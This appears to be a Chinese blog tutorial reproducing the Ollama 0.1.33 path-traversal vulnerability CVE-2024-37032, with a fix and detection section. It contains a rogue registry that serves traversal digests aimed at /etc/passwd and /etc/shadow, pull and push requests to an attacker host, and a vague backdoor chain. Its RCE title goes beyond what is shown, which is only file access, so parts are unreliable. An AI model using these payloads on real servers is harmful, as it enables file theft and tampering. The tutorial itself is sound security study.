当前位置: 首页 > article >正文

手把手复现Ollama 0.1.33的RCE漏洞(CVE-2024-37032),从Docker搭建到PoC利用

深入剖析Ollama 0.1.33路径遍历漏洞CVE-2024-37032的实战复现指南在本地运行大型语言模型已成为当前AI应用开发的热点需求Ollama作为一款轻量级工具链因其开箱即用的特性备受开发者青睐。然而近期披露的CVE-2024-37032漏洞暴露了其早期版本存在的严重安全缺陷——攻击者可通过精心构造的模型清单文件实现任意文件读写。本文将带领读者从零搭建漏洞环境逐步拆解漏洞原理最终完成完整的漏洞利用链复现。1. 漏洞环境构建1.1 准备实验环境建议使用隔离的Linux虚拟机或云服务器进行测试确保主机系统不受影响。实验所需基础组件包括Docker Engine 20.10Python 3.8环境至少4GB可用内存# 验证Docker环境 docker --version # 输出示例Docker version 24.0.5, build ced09961.2 部署漏洞版本OllamaOllama 0.1.33的官方镜像仍可在Docker Hub获取但需注意该版本已标记为不安全docker pull ollama/ollama:0.1.33 docker run -d \ -v ollama_data:/root/.ollama \ -p 11434:11434 \ --name vulnerable_ollama \ ollama/ollama:0.1.33验证服务是否正常启动curl http://localhost:11434/api/tags # 正常应返回空列表{models:[]}2. 漏洞原理深度解析2.1 清单文件处理机制缺陷Ollama的模型分发采用类似Docker Registry的manifest v2格式关键漏洞点在于digest字段的路径校验逻辑。正常情况下的模型清单结构应包含{ schemaVersion: 2, config: { digest: sha256:abc123..., size: 1024 }, layers: [ { digest: sha256:def456..., size: 2048 } ] }漏洞版本未对digest值进行规范化处理导致攻击者可以注入包含路径遍历序列如../../../../etc/passwd的恶意值。2.2 请求处理流程缺陷当Ollama处理/api/pull请求时其内部工作流程存在以下问题未验证远程registry的可信度即使insecurefalse直接使用manifest中的digest值拼接本地文件路径缺少对写入位置的权限检查3. 漏洞利用实战3.1 搭建恶意Registry使用Python FastAPI快速搭建伪装的模型仓库from fastapi import FastAPI, Request, Response app FastAPI() app.get(/v2/rogue/model/manifests/latest) async def malicious_manifest(): return { config: { digest: ../../../../../../etc/passwd, size: 10 }, layers: [ { digest: ../../../../../../etc/shadow, size: 10 } ] }启动服务uvicorn exploit_server:app --host 0.0.0.0 --port 80003.2 触发文件读取构造特殊的pull请求触发漏洞curl -X POST http://localhost:11434/api/pull \ -H Content-Type: application/json \ -d {name:attacker-ip:8000/rogue/model,insecure:true}此时观察Ollama容器的日志可以看到其尝试访问系统敏感文件docker logs vulnerable_ollama # 将显示文件访问错误日志3.3 利用链增强通过组合push和pull操作可以实现更复杂的攻击场景先push精心构造的模型到漏洞主机再pull该模型触发二次漏洞利用最终实现持久化后门植入# 恶意模型push脚本示例 import requests headers {Content-Type: application/json} data {name: localhost:11434/evil/model, insecure: True} response requests.post(http://localhost:11434/api/push, jsondata, headersheaders) print(response.text)4. 防御与修复方案4.1 官方修复措施Ollama在0.1.34版本中实施了多重防护严格校验digest格式必须符合SHA256哈希格式规范化所有文件路径访问增加registry白名单机制升级命令docker pull ollama/ollama:latest docker stop vulnerable_ollama docker rm vulnerable_ollama # 重新启动新版本容器4.2 临时缓解方案若无法立即升级可采取以下措施限制Ollama服务的网络访问启用SELinux/AppArmor等强制访问控制定期审计/root/.ollama目录下的文件变更# 使用inotify监控关键目录 sudo apt install inotify-tools inotifywait -m -r /root/.ollama5. 漏洞研究进阶方向对于希望深入研究的读者建议探索以下方向漏洞变种挖掘测试其他API端点的路径处理逻辑尝试不同编码方式的路径遍历payload影响范围评估分析Windows平台下的利用差异研究容器逃逸的可能性检测方案开发编写YARA规则检测恶意模型文件开发实时监控插件# 简易模型文件检测脚本 import json def check_manifest_safety(manifest_path): with open(manifest_path) as f: data json.load(f) dangerous_patterns [../, ~/, /etc/, /root/] manifest_str json.dumps(data) return not any(pattern in manifest_str for pattern in dangerous_patterns)在实际测试环境中建议使用虚拟机快照功能保存各个阶段的系统状态便于反复验证不同攻击场景。同时务必注意所有实验都应在授权环境下进行避免对生产系统造成影响。

相关文章:

手把手复现Ollama 0.1.33的RCE漏洞(CVE-2024-37032),从Docker搭建到PoC利用

深入剖析Ollama 0.1.33路径遍历漏洞(CVE-2024-37032)的实战复现指南 在本地运行大型语言模型已成为当前AI应用开发的热点需求,Ollama作为一款轻量级工具链,因其开箱即用的特性备受开发者青睐。然而近期披露的CVE-2024-37032漏洞暴…...

实测才敢推 一键生成论文工具 千笔 VS 学术猹 全行业通用

还在为选题→大纲→初稿→文献→降重→查重→格式→答辩PPT的全流程焦头烂额?千笔AI以八大核心功能实现全流程一站式覆盖,从选题到答辩PPT生成全程护航,让论文写作从“耗时耗力”变成“高效规范”,真正实现“选题快、框架稳、修改…...

从零构建RAGFlow全栈应用:React前端与Python API的实战对接

1. RAGFlow架构解析与实战场景设计 RAGFlow这个名词听起来有点技术范儿,但其实它的核心思想特别接地气——就像你去图书馆查资料写论文的过程。首先要在书架上找到相关书籍(检索阶段),然后阅读摘抄有用内容(生成阶段&a…...

救命神器!全行业通用AI论文平台,千笔AI VS 灵感风暴AI

在学术研究的道路上,论文写作往往成为最令人头疼的环节。从选题构思到最终答辩,每一个步骤都充满挑战,尤其是面对海量文献、复杂格式和反复修改时,时间与精力的双重消耗让人苦不堪言。而如今,随着AI技术的飞速发展&…...

别再死记公式了!用Multisim仿真+实物测量,5分钟搞懂运放差分放大电路

运算放大器差分电路实战指南:从仿真到实测的完整学习路径 看着示波器上跳动的波形,我突然意识到——那些在课本上死记硬背的公式,原来可以如此直观地呈现。作为一名电子工程师,我至今记得第一次用Multisim仿真配合实物测量理解差分…...

飞猪酒店API避坑指南:rateplan与库存管理的那些细节

飞猪酒店API深度解析:rateplan与库存管理的实战避坑策略 在酒店分销系统的技术对接中,飞猪平台的API设计以其灵活性和复杂性著称。许多开发团队在初次对接时,往往会在rateplan(价格计划)和库存管理这两个核心模块上栽跟…...

智能Agent新能力:集成BERT文本分割处理复杂用户查询

智能Agent新能力:集成BERT文本分割处理复杂用户查询 你有没有遇到过这种情况?想用AI助手帮你做点复杂的事,比如“帮我查一下明天北京的天气,然后根据天气推荐几个适合的户外活动,最后再把这些活动整理成一个简单的日程…...

永磁同步电机SVPWM算法下脉冲电池加热算法仿真Simulink模型探究

基于永磁同步电机SVPWM算法的脉冲电池加热算法仿真simulink模型。 某an的新技术仿真实现,该仅限用于研究。 邮箱发送。 在电动汽车领域,电池加热技术对于维持电池在低温环境下的性能至关重要。今天咱们就来聊聊基于永磁同步电机SVPWM算法的脉冲电池加热…...

Comsol热电效应仿真模型:温度场与电流场耦合计算,精准分析温度、电势与电场分布

Comsol热电效应仿真计算模型,采用温度场和电流场耦合热电效应多物理场进行计算,可以得到计算模型的温度场、电势和电场分布打开COMSOL软件新建模型时,总有人纠结该选哪个物理场接口。搞热电仿真根本不用纠结——直接双击"热电效应"…...

感应加热仿真:当电磁场和温度场搞起联动

Comsol工件感应加热仿真计算模型,采用温度场和电磁场耦合电磁热多物理场进行计算,可以得到计算模型的温度场和电磁场分布车间里烧得通红的金属件,背后可能藏着一场电磁与温度的"物理CP秀"。COMSOL的多物理场耦合功能,让…...

星露谷物语无头服务器搭建:从零到一构建专属联机农场

1. 为什么需要无头服务器? 很多星露谷物语玩家都遇到过这样的困扰:想和朋友联机种田,但Steam联机经常卡顿,主机玩家下线后其他人就没法继续游戏。这时候,一个24小时在线的专属服务器就显得尤为重要。无头服务器&#…...

智能水产养殖系统-PyQt5-YOLOv8鱼类尺寸自动检测与Modbus数据交互方案

1. 智能水产养殖系统概述 在传统的水产养殖过程中,工人需要手动测量鱼类的体长、体重等生长指标,不仅效率低下,而且容易对鱼类造成应激反应。现在,借助计算机视觉和物联网技术,我们可以实现鱼类尺寸的自动化检测与数据…...

OpenPose vs MediaPipe:姿态识别算法选型指南(含性能对比)

OpenPose vs MediaPipe:深度解析姿态识别算法选型策略 1. 姿态识别技术全景概览 姿态识别作为计算机视觉领域的核心技术之一,已经从实验室走向了工业界的广泛应用。这项技术通过分析图像或视频中的人体关键点位置,构建数字化的人体姿态模型&a…...

倒立摆这玩意儿在控制领域算是个经典玩具,今天咱们用MATLAB整点有意思的——用LQR同时实现小车的平衡控制和外加摆杆起摆。先来点硬核的,直接上状态方程

MATLAB直线倒立摆一阶倒立摆LQR控制仿真,小车倒立摆起摆和平衡控制,附带参考文献% 系统参数(单位全部国际标准制) M 0.5; % 小车质量 m 0.2; % 摆杆质量 l 0.3; % 摆杆半长 g 9.81; % 重力加速度% 状态空间模型推导…...

打卡信奥刷题(2996)用C++实现信奥题 P6148 [USACO20FEB] Swapity Swapity Swap S

P6148 [USACO20FEB] Swapity Swapity Swap S 题目描述 Farmer John 的 NNN 头奶牛(1≤N≤1051\leq N\leq 10^51≤N≤105)站成一排。对于每一个 1≤i≤N1\leq i\leq N1≤i≤N,从左往右数第 iii 头奶牛的编号为 iii。 Farmer John 想到了一个新…...

从AntSword抓包看一句话木马:为什么你的webshell能被安全工具检测到?

从流量特征解密一句话木马的检测与对抗 在网络安全攻防演练中,一句话木马因其隐蔽性和灵活性成为攻击者常用的持久化手段。但为什么这些看似简单的代码片段能被现代安全设备精准识别?本文将通过中国蚁剑的实际抓包案例,结合Wireshark和BurpSu…...

SmolVLA模拟技术面试官:动态追问与深度评估展示

SmolVLA模拟技术面试官:动态追问与深度评估展示 最近在技术社区里,一个话题讨论得挺热:有没有什么工具能模拟真实的技术面试,帮你提前感受一下高压下的临场反应?毕竟,对着文档刷题是一回事,面对…...

nlp_structbert_sentence-similarity_chinese-large助力内容社区:CSDN博客相似文章推荐

nlp_structbert_sentence-similarity_chinese-large助力内容社区:CSDN博客相似文章推荐 你有没有过这样的经历?在CSDN上读完一篇讲“Spring Boot自动配置原理”的文章,感觉意犹未尽,还想看看其他开发者从不同角度是怎么理解的。于…...

MedCLIP:解锁医学多模态对比学习的数据效率与语义精准度

1. 医学多模态学习的困境与突破 想象一下,你手里有两本厚厚的医学资料:一本是成千上万的X光片,另一本是对应的诊断报告。传统方法要求你把每张片子与对应的报告精确匹配才能训练AI系统,这就像要求图书管理员必须记住每本书的确切位…...

VL53L0X激光测距模块的四种工作模式详解:如何根据场景选择最佳模式

VL53L0X激光测距模块的四种工作模式详解:如何根据场景选择最佳模式 激光测距技术在工业自动化、机器人导航、智能家居等领域扮演着关键角色。作为STMicroelectronics推出的新一代飞行时间(ToF)激光测距模块,VL53L0X凭借其高精度、快速响应和小型化设计&a…...

Android蓝牙遥控按键适配全攻略:从kl文件修改到KeyEvent映射

Android蓝牙遥控按键适配全攻略:从kl文件修改到KeyEvent映射 在智能硬件生态中,蓝牙遥控器作为人机交互的重要媒介,其按键适配的精准度直接影响用户体验。不同于标准输入设备,第三方蓝牙遥控常面临按键无响应、功能错位等兼容性问…...

计算机毕业设计springboot智慧城市物业管理系统 基于Spring Boot的智慧社区综合服务平台设计与实现 基于Java Web的数字化小区物业运营管理系统开发

计算机毕业设计springboot智慧城市物业管理系统6398k9 (配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。 随着城市化进程的不断推进和信息技术的深度融合,传统物业管理…...

计算机毕业设计springboot小区服务平台管理设计与开发 基于SpringBoot的智慧社区综合管理系统设计与实现 微服务架构下住宅小区数字化服务平台构建研究

计算机毕业设计springboot小区服务平台管理设计与开发jylcm9 (配套有源码 程序 mysql数据库 论文) 本套源码可以在文本联xi,先看具体系统功能演示视频领取,可分享源码参考。随着城镇化进程的不断加快,城市住宅小区数量持续增长&am…...

从Mask2Former到ONNX:实战部署与疑难排错指南

1. 环境准备:从零搭建Mask2Former转ONNX的完整工具链 第一次尝试将Mask2Former模型转为ONNX格式时,我花了整整三天时间在环境配置上。各种版本冲突、依赖缺失的问题接踵而至,甚至一度让我怀疑人生。后来才发现,关键在于从一开始就…...

自适应惩罚因子调整(伪代码)

基于comsol的双目标函数流热拓扑优化液冷板结构设计,双目标函数为最小化平均温度和最小流体功率耗散最小的无量纲化,欢迎交流 附赠案例参考文献和针对本案例的所有问题,搞散热设计的都知道,液冷板内部的流道结构直接决定散热效率和…...

魔搭社区vs HuggingFace:国内开发者下载Qwen2-7B的最快姿势

魔搭社区与HuggingFace:国内开发者高效获取Qwen2-7B的实战指南 当国内开发者需要获取最新开源大语言模型时,网络环境往往成为第一道门槛。以阿里云最新开源的Qwen2-7B模型为例,如何绕过下载速度慢、连接不稳定等痛点?本文将深度对…...

Handling of user login failure

Handling of user login failure 用户登录失败处理 维护旧系统的难度啊,你以为啊呢,阅读代码(很费时间),如何实现,是否符合原先架构(不是你开发的麻烦费时间),验证&…...

Traffic Accidents 2026.03.22

Traffic Accidents 交通事故自行车电动车与小汽车案例 交通法规因为大多数都是文字描述,没有图解,大多数民众包含自己也不是很清晰,看到我就用产品软件需求理解的过程,画图,原型这种加深下理解,这也是实际生…...

Java 数据 01:MyBatis-Plus 复杂查询(Lambda+Wrapper 多条件)

MyBatis-Plus 的 复杂查询 是日常开发中最常用的功能之一,尤其当条件动态、多字段组合、嵌套逻辑(and/or)、范围查询、分页排序等场景时,LambdaQueryWrapper 是目前(2025–2026 年)最推荐的方式。 它比老的…...

HTML + CSS + JavaScript 快速入门(三):JS 与 jQuery 实战

HTML CSS JavaScript 快速入门(三):JavaScript 与 jQuery 实战(2026 年视角) 这是系列第三讲,我们进入 JavaScript(简称 JS)核心内容,并对比经典的 jQuery。 2026 年的…...